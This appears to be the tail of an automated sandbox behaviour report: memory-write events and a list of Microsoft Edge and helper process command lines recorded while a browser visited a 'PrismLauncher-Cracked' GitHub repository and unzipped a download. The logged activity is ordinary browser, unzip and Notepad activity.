PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://github.com/Diegiwg/PrismLauncher-Cracked

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffe536ef208,0x7ffe536ef214,0x7ffe536ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2220,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2612,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4988,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5240,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5440 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4792,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6000,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5884,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6312,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6188,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3076 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4336,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=5576,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4996,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6096,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:8

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\PrismLauncher-Windows-MSVC-arm64-9.4\qtlogging.ini

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1688,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6440 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5460,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6032,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=5792,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=3728,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5268,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6752,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=3536,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5400,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1800,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=7180,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5088,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7228,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3516,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7012,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7248,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7132 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=3632,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=7308,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=1472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

